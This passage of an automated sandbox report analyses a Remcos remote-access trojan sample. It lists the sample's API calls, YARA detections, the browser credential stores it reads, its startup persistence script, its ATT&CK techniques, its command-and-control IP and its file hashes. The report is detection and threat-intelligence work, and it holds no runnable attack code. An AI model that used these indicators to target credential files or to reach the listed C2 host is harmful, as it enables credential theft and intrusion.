Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 2_2_00450E6A
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: EnumSystemLocalesW | 5_2_004470AE
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetLocaleInfoW | 5_2_004510BA
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 5_2_004511E3
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetLocaleInfoW | 5_2_004512EA
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 5_2_004513B7
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetLocaleInfoW | 5_2_00447597
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetLocaleInfoA | 5_2_0040E679
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW | 5_2_00450A7F
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: EnumSystemLocalesW | 5_2_00450CF7
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: EnumSystemLocalesW | 5_2_00450D42
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: EnumSystemLocalesW | 5_2_00450DDD
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 5_2_00450E6A
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B84E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter | 0_2_00B84E87
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B91E06 GetUserNameW | 0_2_00B91E06
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B83F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte | 0_2_00B83F3A
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_00B549A0
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Milburr.exe, 00000004.00000002.2270035484.0000000001027000.00000004.00000020.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2281229333.00000000015C9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: l1QC9H0SNR.exe, 00000000.00000003.2120110912.000000000104A000.00000004.00000020.00020000.00000000.sdmp, l1QC9H0SNR.exe, 00000000.00000002.2131421488.000000000104A000.00000004.00000020.00020000.00000000.sdmp, l1QC9H0SNR.exe, 00000000.00000003.2120047789.0000000001027000.00000004.00000020.00020000.00000000.sdmp, Milburr.exe, 00000002.00000002.4574070147.0000000001213000.00000004.00000020.00020000.00000000.sdmp, Milburr.exe, 00000004.00000002.2270035484.0000000001027000.00000004.00000020.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2281229333.00000000015C9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mcupdate.exe

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000002.00000002.4575991012.0000000003E6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2281153273.000000000151B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2281175297.0000000001557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.4573965402.0000000001187000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.4573167433.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data, 2_2_0040B21B
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data, 5_2_0040B21B
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\, 2_2_0040B335
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: \key3.db, 2_2_0040B335
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\, 5_2_0040B335
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: \key3.db, 5_2_0040B335
                    Source: Milburr.exe | Binary or memory string: WIN_81
                    Source: Milburr.exe | Binary or memory string: WIN_XP
                    Source: Milburr.exe | Binary or memory string: WIN_XPe
                    Source: Milburr.exe | Binary or memory string: WIN_VISTA
                    Source: Milburr.exe | Binary or memory string: WIN_7
                    Source: Milburr.exe | Binary or memory string: WIN_8
                    Source: Milburr.exe, 00000005.00000002.2280550392.0000000000774000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                    Remote Access Functionality

                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDH
                    Source: Yara match | File source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000002.00000002.4575991012.0000000003E6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2281153273.000000000151B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2281175297.0000000001557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.4573965402.0000000001187000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.4573167433.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: cmd.exe, 2_2_00405042
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: cmd.exe, 5_2_00405042
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BC6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00BC6283
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BC6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00BC6747
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00736283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 2_2_00736283
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00736747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 2_2_00736747
                    MITRE ATT&CK Matrix

                    Techniques matched by this sample, grouped by tactic; the number in parentheses is the count shown next to each technique in the report. Tactics with no matched technique (Reconnaissance, Lateral Movement, Exfiltration) are omitted.

                    • Resource Development: Scripting (111)
                    • Initial Access: Valid Accounts (2)
                    • Execution: Native API (2); Command and Scripting Interpreter (1); Service Execution (2)
                    • Persistence: Scripting (111); DLL Side-Loading (1); Valid Accounts (2); Windows Service (1); Registry Run Keys / Startup Folder (2)
                    • Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Bypass User Account Control (1); Valid Accounts (2); Access Token Manipulation (21); Windows Service (1); Process Injection (22); Registry Run Keys / Startup Folder (2)
                    • Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (21); Software Packing (1); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (1); Access Token Manipulation (21); Process Injection (22)
                    • Credential Access: OS Credential Dumping (1); Input Capture (121); Credentials In Files (2)
                    • Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (4); System Information Discovery (26); Security Software Discovery (241); Virtualization/Sandbox Evasion (1); Process Discovery (2); Application Window Discovery (11); System Owner/User Discovery (1)
                    • Collection: Archive Collected Data (11); Input Capture (121); Clipboard Data (3)
                    • Command and Control: Ingress Tool Transfer (11); Encrypted Channel (2); Remote Access Software (1); Application Layer Protocol (1)
                    • Impact: System Shutdown/Reboot (1); Defacement (1)
                    Behavior Graph (ID: 1588244, Sample: l1QC9H0SNR.exe, Startdate: 10/01/2025, Architecture: WINDOWS, Score: 100)

                    Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures

                    • l1QC9H0SNR.exe (started)
                      • Dropped: C:\Users\user\AppData\Local\...\Milburr.exe (PE32)
                      • Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      • Started: Milburr.exe
                        • Network: 192.210.150.26, 3678, 49709, 49711 (AS-COLOCROSSINGUS, United States)
                        • Dropped: C:\Users\user\AppData\Roaming\...\Milburr.vbs (data); C:\ProgramData\remcos\logs.dat (data)
                        • Signatures: Multi AV Scanner detection for dropped file; Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; 7 other signatures
                    • wscript.exe (started)
                      • Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      • Started: Milburr.exe
                        • Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        • Started: Milburr.exe
                          • Signatures: Detected Remcos RAT; Binary is likely a compiled AutoIt script file

                    Antivirus detection, submitted file
                    Source | Detection | Scanner | Label
                    l1QC9H0SNR.exe | 68% | Virustotal |
                    l1QC9H0SNR.exe | 75% | ReversingLabs | Win32.Backdoor.Remcos
                    l1QC9H0SNR.exe | 100% | Joe Sandbox ML |

                    Antivirus detection, dropped files
                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | 100% | Joe Sandbox ML |
                    C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | 75% | ReversingLabs | Win32.Backdoor.Remcos
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    No contacted domains info
                    Name | Source | Malicious | Reputation
                    http://geoplugin.net/json.gp | Milburr.exe | false | high
                    http://geoplugin.net/json.gp/C | Milburr.exe, 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Milburr.exe, 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Milburr.exe, 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp | false | high
                        IP | Domain | Country | ASN | ASN Name | Malicious
                        192.210.150.26 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1588244
                        Start date and time:2025-01-10 22:59:35 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 8s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of new started processes analysed:14
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:l1QC9H0SNR.exe
                        renamed because original name is a hash value
                        Original Sample Name:c889443786dc57c284a40fd1a9764bad2f026a8c20e191059707d1646ff931e0.exe
                        Detection:MAL
                        Classification:mal100.rans.troj.spyw.expl.evad.winEXE@8/13@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 58
                        • Number of non-executed functions: 279
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        Time | Type | Description
                        17:01:01 | API Interceptor | 7116284x Sleep call for process: Milburr.exe modified
                        23:00:31 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs
                        Match | Associated Sample Name / URL | Detection | Threat Name
                        192.210.150.26 | bwYw3UUfy7.exe | malicious | Remcos
                        192.210.150.26 | FACTURA.xlsx | malicious | Remcos
                        192.210.150.26 | 7056ZCiFdE.exe | malicious | Remcos
                        192.210.150.26 | uIarPolvHR.exe | malicious | Remcos
                        192.210.150.26 | IB9876789000.bat.exe | malicious | Remcos
                        192.210.150.26 | z49FACTURA-0987678.exe | malicious | Remcos
                        192.210.150.26 | FAT6789098700900.scr.exe | malicious | Remcos
                        192.210.150.26 | Rgh99876k7e.exe | malicious | Remcos
                        192.210.150.26 | SALKI098765R400.exe | malicious | Remcos
                        192.210.150.26 | FTE98767800000.bat.exe | malicious | Remcos
                        No context
                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                        AS-COLOCROSSINGUS | MLxloAVuCZ.exe | malicious | Remcos | 192.3.64.152
                        AS-COLOCROSSINGUS | bwYw3UUfy7.exe | malicious | Remcos | 192.210.150.26
                        AS-COLOCROSSINGUS | Nuevo-orden.xla.xlsx | malicious | Unknown | 192.3.27.144
                        AS-COLOCROSSINGUS | Nuevo-orden.xla.xlsx | malicious | Unknown | 192.3.27.144
                        AS-COLOCROSSINGUS | Nuevo-orden.xla.xlsx | malicious | Unknown | 192.3.27.144
                        AS-COLOCROSSINGUS | sh4.elf | malicious | Mirai | 23.95.117.229
                        AS-COLOCROSSINGUS | sweetnessgoodforgreatnessthingswithgood.tIF.vbs | malicious | SmokeLoader | 192.3.27.144
                        AS-COLOCROSSINGUS | begoodforeverythinggreatthingsformebetterforgood.hta | malicious | Cobalt Strike, SmokeLoader | 192.3.27.144
                        AS-COLOCROSSINGUS | PO#3311-20250108003.xls | malicious | Unknown | 192.3.27.144
                        AS-COLOCROSSINGUS | PO#3311-20250108003.xls | malicious | Unknown | 192.3.27.144
                        No context
                        No context
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):204
                                            Entropy (8bit):3.3359425119253987
                                            Encrypted:false
                                            SSDEEP:3:rglsOlfUlSl9U5JWRal2Jl+7R0DAlBG45klovDl64oojklovDl6v:Mls6UlSs5YcIeeDAlOWA41gWAv
                                            MD5:536B536A90D98BBCC091AC5516A08495
                                            SHA1:BEE4E3E04B0BBCF197AB6EE93E63D3BBC4135207
                                            SHA-256:86D354A89109E6510CA5DB58B055238D464BC032BDF02F41DA959C4894C678D7
                                            SHA-512:C677633380C66A0E994CF3B3DDC6A63720D93E32AC5BD8D5638BDFAADC1C315DFB65F7B446ED44217CD41E047C09B055D1023360F0B4DCC26B16E397AD3FF42E
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                            Reputation:low
                                            Preview (UTF-16LE text, shown decoded):[2025/01/10 17:00:28 Offline Keylogger Started] [Program Manager] [Run] [Program Manager]
                                            Process:C:\Users\user\Desktop\l1QC9H0SNR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):492544
                                            Entropy (8bit):7.568668414012018
                                            Encrypted:false
                                            SSDEEP:12288:Bk1P31hPfYMVOxdwC2kEPuqzrgGqHkg6H9yy4zG5F1i4xP:Bk1P319fYlByPuqfgXb6DtXi4xP
                                            MD5:E8F92D99524EFF3DE429C3718B7A1491
                                            SHA1:B0C6F6A240841E77E7D20F99B379A9C6EE35D85B
                                            SHA-256:894CB71AD99FF88B5C93218788DE1D133B4D0404D4996F7E5D3255209322F6E9
                                            SHA-512:4CF796747DB21C4EB2CDA23FB79E184C49B62B2E84E15B669A0025224991E4F9E0E261C6E03A12DD8B5E6B105D2AA7E8E652AA3F4863CEC73A88BC02906C17D6
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\l1QC9H0SNR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):414136
                                            Entropy (8bit):7.981207697530746
                                            Encrypted:false
                                            SSDEEP:12288:QybYqhspyXD4x3fqeDypBCJXqEGsKRjVXByS81PXkU:QghsppFwuqbZVr4XZ
                                            MD5:DF6CE24C1D936B4B56DCD548DEF18B8D
                                            SHA1:BB8CCA79E83C81605FE2B2FFCFB657612FD798A1
                                            SHA-256:FED7B359F763F28D9E01BB5F6C734A29F17A67AE34161F4053DDAC0407F52610
                                            SHA-512:7AEA698B0A2C06812FBE00D0315AF7BA18C15AE572C2EF7088DB28CE3A5B6AB122CE4E711E8FE20D7763A47E8591AFB248A02B55D5059F49F06B3201918648E8
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\l1QC9H0SNR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):14584
                                            Entropy (8bit):7.63320383966088
                                            Encrypted:false
                                            SSDEEP:384:ITYznw6siKOPb6ZyDWPcq7jisLHk6h8FAeXHxHiWp3isCLf:IAw6sipDqcSLHwFAeRiZsCz
                                            MD5:00360588750369BC243ED68948507859
                                            SHA1:861AF2E9E7E94F3FBABB95259D86F2A93C4EDDB3
                                            SHA-256:71E5D5E454B65C35189F3CC57C5923678F53758420ABF6C3975A0E188FB8D855
                                            SHA-512:C8B360B472A1E0CB8957AFCE1EC644D465EB087B28328D7B3D3C88B3C2870CA885D42D66C9CFAEAE2347D02A87E47DA645A92F16C6140CEB036DF147F91D51DF
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):414136
                                            Entropy (8bit):7.981207697530746
                                            Encrypted:false
                                            SSDEEP:12288:QybYqhspyXD4x3fqeDypBCJXqEGsKRjVXByS81PXkU:QghsppFwuqbZVr4XZ
                                            MD5:DF6CE24C1D936B4B56DCD548DEF18B8D
                                            SHA1:BB8CCA79E83C81605FE2B2FFCFB657612FD798A1
                                            SHA-256:FED7B359F763F28D9E01BB5F6C734A29F17A67AE34161F4053DDAC0407F52610
                                            SHA-512:7AEA698B0A2C06812FBE00D0315AF7BA18C15AE572C2EF7088DB28CE3A5B6AB122CE4E711E8FE20D7763A47E8591AFB248A02B55D5059F49F06B3201918648E8
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06......;4*.2a0..5=...8.RhU.......U.T........0..hUj.*}W.V3.M..E..Z.BO0.M'..<bk(.M.tH..Oq...............i}..(......~o..3....9......S.........r.-....p..7...|...>&?..]tT...=....7F...h.9~w<...D=Z..g...^.Z.D+...^1.]Dk'...p...C+...oT......[O......S....KQ(.N....j....V..T.H..hR...Q..`....3.U.@.....@.....iS......]5.U.Gq..hU...TiU.T.Y.V+.....J...b....N..L.L@..6........y...YJd...+.v>...$.<..j.....$.........*.y..iD..)..}F.(..'.. ......,Y$r..P..n.)I.Z.Q..x.j..?...\#.9..d..U!`...aW.....`.....N2.y..}S..81....XD...M......1;$._T..U.d,....)U.......<|w ....?....!.z..3].TdY9.2....&ux.K.2.Cg...6.L.agpz..cy..!...2.w.o...*s..D.:..g0.`gq=...;.D<<...)..n...T.}..Gi.....Q.bgt......i/....s..E)]...X...6..Z...Qg.i..i..v(6..N'...-....?.U.ZY.>..._.T(.>.0.J..JV...ReZi..a..]...F'....-..uZ.9.....%..i.U.u.d6...^i4).z.u..wJMF'...o..gc.Y.Tgui.>q...kt.O....-.y...~..-.....V.|..c.m...Qi=...._...NS.a..-.z.....Zf .T...C.GIU..t..@GH...u.L.QjWB/G.V$.Z.J....jT..W....-.Jp..>.Zk..V.],..(3..
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):14584
                                            Entropy (8bit):7.63320383966088
                                            Encrypted:false
                                            SSDEEP:384:ITYznw6siKOPb6ZyDWPcq7jisLHk6h8FAeXHxHiWp3isCLf:IAw6sipDqcSLHwFAeRiZsCz
                                            MD5:00360588750369BC243ED68948507859
                                            SHA1:861AF2E9E7E94F3FBABB95259D86F2A93C4EDDB3
                                            SHA-256:71E5D5E454B65C35189F3CC57C5923678F53758420ABF6C3975A0E188FB8D855
                                            SHA-512:C8B360B472A1E0CB8957AFCE1EC644D465EB087B28328D7B3D3C88B3C2870CA885D42D66C9CFAEAE2347D02A87E47DA645A92F16C6140CEB036DF147F91D51DF
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):414136
                                            Entropy (8bit):7.981207697530746
                                            Encrypted:false
                                            SSDEEP:12288:QybYqhspyXD4x3fqeDypBCJXqEGsKRjVXByS81PXkU:QghsppFwuqbZVr4XZ
                                            MD5:DF6CE24C1D936B4B56DCD548DEF18B8D
                                            SHA1:BB8CCA79E83C81605FE2B2FFCFB657612FD798A1
                                            SHA-256:FED7B359F763F28D9E01BB5F6C734A29F17A67AE34161F4053DDAC0407F52610
                                            SHA-512:7AEA698B0A2C06812FBE00D0315AF7BA18C15AE572C2EF7088DB28CE3A5B6AB122CE4E711E8FE20D7763A47E8591AFB248A02B55D5059F49F06B3201918648E8
                                            Malicious:false
                                            Reputation:low
